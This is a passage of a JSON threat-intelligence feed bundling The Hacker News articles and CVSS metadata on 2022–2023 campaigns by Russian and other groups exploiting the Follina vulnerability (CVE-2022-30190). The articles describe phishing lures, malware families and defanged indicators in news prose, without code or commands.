{"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-05-24T06:25:07", "id": "THN:1B983787EB2BA5D0757F1F83458B7ABE", "href": "https://thehackernews.com/2023/05/goldenjackal-new-threat-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T16:23:01", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgNo0JIZZ2xVs6xWtBDjG87OxZhnIm24TPPfBsB4b1eUH3h75A9m5-rMQtbJNUn997mhuZ9FVOeso_N8_mbXm7xPWkdN_VN9xEC-jz_XOOnSKdgBn0U32ePvsu7MkJ99eVXjBZrFnXBotJEoO7vu7eUykxbIFN-6PnFuHXb16ZuNxWHY26VBO19rhGB/s728-e100/russian-hackers.jpg>)\n\nFormer members of the Conti cybercrime cartel have been implicated in five different campaigns targeting Ukraine from April to August 2022.\n\nThe findings, which come from Google's Threat Analysis Group (TAG), builds upon a [prior report](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) published in July 2022 detailing the [continued cyber activity](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/>) aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war.\n\n\"UAC-0098 is a threat actor that historically delivered the [IcedID banking trojan](<https://thehackernews.com/2022/03/hackers-hijack-email-reply-chains-on.html>), leading to human-operated ransomware attacks,\" TAG researcher Pierre-Marc Bureau [said](<https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/>) in a report shared with The Hacker News.\n\n\"The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations.\"\n\nUAC-0098 is believed to have functioned as an initial access broker for ransomware groups such as Quantum and [Conti](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) (aka FIN12, Gold Ulrick, or Wizard Spider), the former of which was [subsumed by the latter](<https://thehackernews.com/2022/08/conti-cybercrime-cartel-using-bazarcall.html>) in April 2022.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwAToWSwhUxNkqZBnap1saOcSptSsRKdR2PCuiQamQfKMMtK9-B7ynmiF-gdlmDCOj8RDPb54wYwMRwiIXBFKTwDGotN-y7Rlc4SLlXv-jQUmbV7_4igIalD1e_sKbpjs6ZZYEUwsTet-4KSgvQpaxTA0AqjnN7-DuVbePjhJNOznNM8ypuas5E4_D/s728-e100/google-malware.jpg>)\n\nOne of the prominent campaigns undertaken by the group in June 2022 entailed the abuse of [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the Windows operating system to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts in media and critical infrastructure entities.\n\nBut this appears to be a part of a series of attacks that commenced way back in late April 2022, when the group conducted an email phishing campaign to deliver [AnchorMail](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>) (aka LackeyBuilder), a variant of the TrickBot group's AnchorDNS implant that uses SMTP for command-and-control.\n\nSubsequent phishing campaigns distributing IcedID and Cobalt Strike have been directed against Ukrainian organizations, repeatedly striking the hospitality sector, some of which impersonated the National Cyber Police of Ukraine or representatives of Elon Musk and StarLink.\n\nAround mid-May, UAC-0098 is also said to have leveraged a compromised account of a hotel in India to send malware-laced attachments to organizations working in the hospitality industry in Ukraine, before expanding to humanitarian NGOs in Italy.\n\nSimilar attacks have also been observed against entities in the technology, retail, and government sectors, with the IcedID binary concealed as a Microsoft update to trigger the infection. Post-exploitation steps carried out following a successful compromise have not been identified.\n\nUAC-0098 is far from the only Conti-affiliated hacking group to set its sights on Ukraine since the onset of the war. In July 2022, IBM Security X-Force [disclosed](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) that the TrickBot gang orchestrated six different campaigns to systematically target the country with a plethora of malware.\n\n\"UAC-0098 activities are representative examples of blurring lines between financially motivated and government backed groups in Eastern Europe, illustrating a trend of threat actors changing their targeting to align with regional geopolitical interests,\" Bureau said.\n\n\"The group demonstrates strong interest in breaching businesses operating in the hospitality industry of Ukraine, going as far as launching multiple distinct campaigns against the same hotel chains.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-07T14:42:00", "type": "thn", "title": "Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-14T13:52:54", "id": "THN:8C7C0BBCE90D4B2076F46E011BAB609D", "href": "https://thehackernews.com/2022/09/some-members-of-conti-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-22T06:04:11", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgn45Ck6vqDFvA2leDePKdPhlDH1ahczKEX1G7NW9CKxteJGkz3l_Dxpmjd1SnrDkHKguss5We9LWuDgnHlJuns2KL7DwAsl-xMBxv1S1VLDsBEjacQCutkUNEQVeTllKkGd_8PyVCTLk6MOVTWU_e_tEHf4dzp7n647bD1HgoUG5tWMG9ax-DFlaWb/s728-e100/russian-hackers.jpg>)\n\nA threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.\n\nRecorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as [Colibri loader](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and [Warzone RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria>).\n\nThe attacks are said to be an expansion of the [same campaign](<https://cert.gov.ua/article/405538>) that previously distributed [DCRat](<https://thehackernews.com/2022/05/experts-sound-alarm-on-dcrat-backdoor.html>) (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine.\n\nSandworm is a [destructive Russian threat group](<https://thehackernews.com/2020/10/russian-hackers.html>) that's best known for carrying out attacks such as the 2015 and 2016 targeting of Ukrainian electrical grid and 2017's NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency.\n\nThe adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical substations, computers and networking equipment for the third time in Ukraine earlier this April through a [new variant of a piece of malware](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) known as Industroyer.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjXC-uZjCaOE_yV1Ns_wdImLvY7yyJYACWqNQeg20fPXqv5CKuqxWQe7J6SuIaEJEfGFj1kYATlPbZUZfu1WcJ3BKgFQldFDoa_8Ak0IbRePTyHl5roYnEv5BqaJPBWNSFWwm2IRfiLxEPXIK6b1T9KLchmrOrOYDES07WewyUwSgVt1Ma91-35cy2g/s728-e100/link.jpg>)\n\nRussia's invasion of Ukraine has also had the group unleash numerous other attacks, including [leveraging the Follina vulnerability](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to breach media entities in the Eastern European nation.\n\nIn addition, it was uncovered as the mastermind behind a new modular botnet called [Cyclops Blink](<https://thehackernews.com/2022/04/fbi-shut-down-russia-linked-cyclops.html>) that enslaved internet-connected firewall devices and routers from WatchGuard and ASUS.\n\nThe U.S. government, for its part, has announced up to [$10 million in rewards](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) for information on six hackers associated with the APT group for participating in malicious cyber activities against critical infrastructure in the country.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhqC088Qg7YBtg3UXFBJalDCP6mVfxKfvjY5yNkkSnaAzijWLnHr-5hw8ZRAGsRo2kw_2ahBrMMxkklXzZZWQwTk1RdkJ62o6UmJjDK99d2kflQJO76hiDcGt0eVnK9HwdB4v6gYy3p6HhbHfT-i8shyoNIyTsvC0moN0M6dNQGjqFBw-pTH9Rg6yvA/s728-e100/hack.jpg>)\n\n\"A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware,\" Recorded Future [said](<https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine>).\n\nThe attacks entail the fraudulent domains hosting a web page purportedly about \"Odesa Regional Military Administration,\" while an encoded ISO image payload is stealthily deployed via a technique referred to as [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>).\n\nHTML smuggling, as the name goes, is an evasive malware delivery technique that leverages legitimate HTML and JavaScript features to distribute malware and get around conventional security controls.\n\nRecorded Future also said it identified points of similarities with another [HTML dropper attachment](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) put to use by the APT29 threat actor in a campaign aimed at Western diplomatic missions between May and June 2022.\n\nEmbedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine.\n\nThe execution of the LNK file also launches an innocuous decoy document \u2013 an application for Ukrainian citizens to request for monetary compensation and fuel discounts \u2013 in an attempt to conceal the malicious operations.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-20T12:56:00", "type": "thn", "title": "Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-22T06:02:31", "id": "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "href": "https://thehackernews.com/2022/09/russian-sandworm-hackers-impersonate.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T15:35:06", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjWMKOvweSFs-6_yTKhS8Ei2IBg2vcJuX9wiigmwmv2hOkJWeIzjBRPZIGuCENyJ3ZhGbdw4r7S79Z_QdBYo0oVXNm1oL_JGsK3zHlILQmiu3OHiuBKqzhrFWj-vyyCk813l8T4dSdgnOz-c05mTwyfEA0pwW8cRr31kStWCgi_TDxMXnmMfDgheC7X/s728-e100/windows.jpg>)\n\nA suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office \"Follina\" vulnerability to target government entities in Europe and the U.S.\n\nEnterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked as [CVE-2022-30190](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) (CVSS score: 7.8). No less than 1,000 phishing messages containing a lure document were sent to the targets.\n\n\"This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253,\" the company [said](<https://twitter.com/threatinsight/status/1532830739208732673>) in a series of tweets.\n\nThe payload, which manifests in the form of a PowerShell script, is Base64-encoded and functions as a downloader to retrieve a second PowerShell script from a remote server named \"seller-notification[.]live.\"\n\n\"This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil[tration] to 45.77.156[.]179,\" the company added.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiF_m7_KsHBbfl6j9PPTd8t5DZ4_iAR6cG5PWwiqwiHn_YkdsXkjr3qRPs83Oje0Y5pqaKc2zav2Crnq-KH0HGQpBeKMWZaR8dtf2akXuHmO8cwk7tpkBX5uKcHjq5az14xOsPTCFUi71Lo2E4DebsFoKvV-d0ML_UZr_ap7hkNoBGdGo3Q4L6VVWgs/s728-e100/hacking.jpg>)\n\nThe phishing campaign has not been linked to a previously known group, but said it was mounted by a nation-state actor based on the specificity of the targeting and the PowerShell payload's wide-ranging reconnaissance capabilities.\n\nThe development follows [active exploitation attempts](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by a Chinese threat actor tracked as TA413 to deliver weaponized ZIP archives with malware-rigged Microsoft Word documents.\n\nThe Follina vulnerability, which leverages the \"ms-msdt:\" protocol URI scheme to remotely take control of target devices, remains unpatched, with Microsoft urging customers to [disable the protocol](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) to prevent the attack vector.\n\nIn the absence of a security update, 0patch has released an [unofficial fix](<https://blog.0patch.com/2022/06/free-micropatches-for-follina-microsoft.html>) to block ongoing attacks against Windows systems that target the Microsoft Windows Support Diagnostic Tool (MSDT) vulnerability.\n\n\"It doesn't matter which version of Office you have installed, or if you have Office installed at all: the vulnerability could also be exploited through [other attack vectors](<https://twitter.com/0xBacco/status/1531599168363548672>),\" 0patch's Mitja Kolsek said.\n\n\"Proofpoint continues to see targeted attacks leveraging CVE-2022-30190,\" Sherrod DeGrippo, vice president of threat research, said in a statement shared with The Hacker News.\n\n\"The extensive reconnaissance conducted by the second PowerShell script demonstrates an actor interested in a large variety of software on a target's computer. This, coupled with the tight targeting of European government and local U.S. governments, led us to suspect this campaign has a state aligned nexus.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T02:54:00", "type": "thn", "title": "State-Backed Hackers Exploit Microsoft 'Follina' Bug to Target Entities in Europe and U.S", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:27:16", "id": "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "href": "https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T03:59:01", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi1QE9YZxJQ6JKfU-Sykp9EhrAHv5DKf6S7qEofv-1kjCV8SamqdavCZcQ9VYRPBJo1Hyb0S2mD1SzfQulPeSx9sUm-eGvZsNXCn3qcQMfYMkYO8fsqBA53p-o42rQ4uqGeyzkO1_9XItfMG_wGq3g7TdYI8GR62vky7GemJ7dthWmKIEfPcKK9qnSB/s728-e100/russian-ddos-app.jpg>)\n\nRussian threat actors capitalized on the [ongoing conflict](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) against Ukraine to distribute Android malware camouflaged as an app for pro-Ukrainian hacktivists to launch distributed denial-of-service (DDoS) attacks against Russian sites.\n\nGoogle Threat Analysis Group (TAG) attributed the malware to Turla, an advanced persistent threat also known as Krypton, Venomous Bear, Waterbug, and Uroburos, and linked to Russia's Federal Security Service (FSB).\n\n\"This is the first known instance of Turla distributing Android-related malware,\" TAG researcher Billy Leonard [said](<https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/>). \"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.\"\n\nIt's worth noting that the [onslaught ](<https://thehackernews.com/2022/04/microsoft-documents-over-200.html>)of [cyberattacks](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) in the immediate aftermath of Russia's unprovoked invasion of Ukraine prompted the latter to [form an IT Army](<https://thehackernews.com/2022/03/both-sides-in-russia-ukraine-war.html>) to stage counter-DDoS attacks against Russian websites. The goal of the Turla operation, it appears, is to use this volunteer-run effort to their own advantage.\n\nThe [decoy app](<https://www.virustotal.com/gui/file/3c62b24594ec3cacc14bdca068a0277e855967210e92c2c17bcf7c7d0d6b782a/>) was hosted on a domain masquerading as the [Azov Regiment](<https://en.wikipedia.org/wiki/Azov_Regiment>), a unit of the National Guard of Ukraine, calling on people from around the world to fight \"Russia's aggression\" by initiating a denial-of-service attack on the web servers belonging to \"Russian websites to overwhelm their resources.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiJ03kkaYUTLinMlQQz9I43ISthyqrTsZa75Jlni48jqqkGuc8ZTNgQMW3J6DvBUkZBOOrTkzlYHoElomW1W2LTMHy5QvZHhM2i_P6XtJ-70QN_PZXzVWj9_4V5J0bvq0G3TNEsYBJTSSUU85A4Dw6EEZ0G74kPK5rSl_NODuMPTwbdTMDoREPAW_qb/s728-e100/android-ddos.jpg>)\n\nGoogle TAG said the actors drew inspiration from another Android app distributed through a website named \"stopwar[.]pro\" that's also designed to conduct DoS attacks by continually sending requests to the target websites.\n\nThat said, the actual number of times the malicious Cyber Azov app was installed is minuscule, posing no major impact on Android users.\n\nAdditionally, the Sandworm group (aka Voodoo Bear) has been connected to a separate set of malicious activities leveraging the [Follina vulnerability](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to send links pointing to Microsoft Office documents hosted on compromised websites targeting media entities in Ukraine.\n\nUAC-0098, a threat actor that CERT-UA last month warned of [distributing tax-themed documents](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) carrying a Follina exploit, has also been assessed to be a former initial access broker with ties to the [Conti group](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) and in charge of disseminating the IcedID banking trojan.\n\nOther kinds of cyber activity include credential phishing attacks mounted by an adversary referred to as COLDRIVER (aka Callisto) aimed at government and defense officials, politicians, NGOs and think tanks, and journalists.\n\nThese involve sending emails either directly, including the phishing domain or containing links to documents hosted on Google Drive and Microsoft OneDrive that, in turn, feature links to an attacker-controlled website designed to steal passwords.\n\nThe [latest developments](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) are yet another indication of how Russian threat actors are exhibiting continued signs of increasing sophistication in their attempts to target in ways that highlight their evolving techniques.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-20T05:58:00", "type": "thn", "title": "Russian Hackers Tricked Ukrainians with Fake \"DoS Android Apps to Target Russia\" \u2014 The Hacker News", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-21T03:06:16", "id": "THN:7A6D54BC76D090840197DDF871D59731", "href": "https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-13T06:20:03", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg9JMOTWNO4-FPPTM7TP8bkCVwriImyXvpv7VTFr2XUHtZzdcGuzRwW7vnlQ0tIPlN-PNl4NNEpYR2RsXxtxbmy5pBv51MN3oQQkFckovY9BOvN3iuzRuY9Bcm6O7J1gJI2mcv4baxrzK2D5G09a5T6mo7RogZ09HaRHGPaikoSQ6VkaVbgFCnUATwn/s728-e365/hacking-code.png>)\n\nCybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the [XWorm malware](<https://thehackernews.com/2023/04/new-qbot-banking-trojan-campaign.html>) on targeted systems.\n\nSecuronix, which is tracking the activity cluster under the name **MEME#4CHAN**, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany.\n\n\"The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims,\" security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov [said](<https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/>) in a new analysis shared with The Hacker News.\n\nThe report builds on [recent findings](<https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla>) from Elastic Security Labs, which revealed the threat actor's reservation-themed lures to deceive victims into opening malicious documents capable of delivering XWorm and Agent Tesla payloads.\n\nThe attacks begin with phishing attacks to distribute decoy Microsoft Word documents that, instead of using macros, weaponize the [Follina vulnerability](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) (CVE-2022-30190, CVSS score: 7.8) to drop an obfuscated PowerShell script.\n\nFrom there, the threat actors abuse the PowerShell script to bypass Antimalware Scan Interface ([AMSI](<https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal>)), disable Microsoft Defender, establish persistence, and ultimately launch the .NET binary containing XWorm.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj631i-4MKG41UrQ2nQGgnLcEMz9NWXnc5l47xOkgvjPbkvk2HLD_3Y0ZinyS3vqc4gN8xbDzS_XwRCMepihDHU51HUNSsAmP8g8TsnKD4_lf7khFhalw49BmoHlAS7utosUKS5PvADJ8udPQvOEEJ7yi3wROycZhtgOozGP37x99LSkwEx28t-DBRd/s728-e365/hacking.png>)\n\nInterestingly, one of the variables in the PowerShell script is named \"$CHOTAbheem,\" which is likely a reference to [_Chhota Bheem_](<https://en.wikipedia.org/wiki/Chhota_Bheem>), an Indian animated comedy adventure television series.\n\n\"Based on a quick check, it appears that the individual or group responsible for the attack could have a Middle Eastern/Indian background, although the final attribution has not yet been confirmed,\" the researchers told The Hacker News, pointing out that such keywords could also be used as a cover.\n\nXWorm is a [commodity malware](<https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/>) that's advertised for sale on underground forums and comes with a wide range of features that allows it to siphon sensitive information from infected hosts.\n\nThe malware is also a Swiss Army knife in that it can perform clipper, DDoS, and ransomware operations, spread via USB, and drop additional malware.\n\nThe exact origins of the threat actor are currently unclear, although Securonix said the attack methodology shares artifacts similar to that of [TA558](<https://thehackernews.com/2022/08/cybercrime-group-ta558-targeting.html>), which has been observed striking the hospitality industry in the past.\n\n\"Though phishing emails rarely use Microsoft Office documents since Microsoft made the decision to [disable macros by default](<https://thehackernews.com/2022/07/hackers-opting-new-attack-methods-after.html>), today we're seeing proof that it is still important to be vigilant about malicious document files, especially in this case where there was no VBscript execution from macros,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-12T21:00:00", "type": "thn", "title": "XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-05-13T05:13:09", "id": "THN:856F9A41F44F9B2C95A68501B0D1B5A7", "href": "https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-09T15:01:41", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEido8u6GqZ98D8le5-jvCFZf7oTbyUDpBVCtJJ-aAhM6YzaxKMxxG8WjsImP_81yZbxVG0zWOpr4I6RvUcPJZ_o4GHZ930oB9ikVkOgiwVEbKIFDsUKnkhX7_9VfJk_6WeTDDHlfo36D7-sW6Wg6Z1Xp27MBtKzEBzVX5ufchx_4j9gUztfCQASBzJA/s728-e365/hacker-.jpg>)\n\nThe threat actor known as **Asylum Ambuscade** has been observed straddling cybercrime and cyber espionage operations since at least early 2020.\n\n\"It is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North America and Europe,\" ESET [said](<https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/>) in an analysis published Thursday. \"Asylum Ambuscade also does espionage against government entities in Europe and Central Asia.\"\n\nAsylum Ambuscade was [first documented](<https://thehackernews.com/2022/03/hackers-try-to-hack-european-officials.html>) by Proofpoint in March 2022 as a nation-state-sponsored phishing campaign that targeted European governmental entities in an attempt to obtain intelligence on refugee and supply movement in the region.\n\nThe goal of the attackers, per the Slovak cybersecurity firm, is to siphon confidential information and web email credentials from official government email portals.\n\nThe attacks start off with a spear-phishing email bearing a malicious Excel spreadsheet attachment that, when opened, either exploits VBA code or the Follina vulnerability 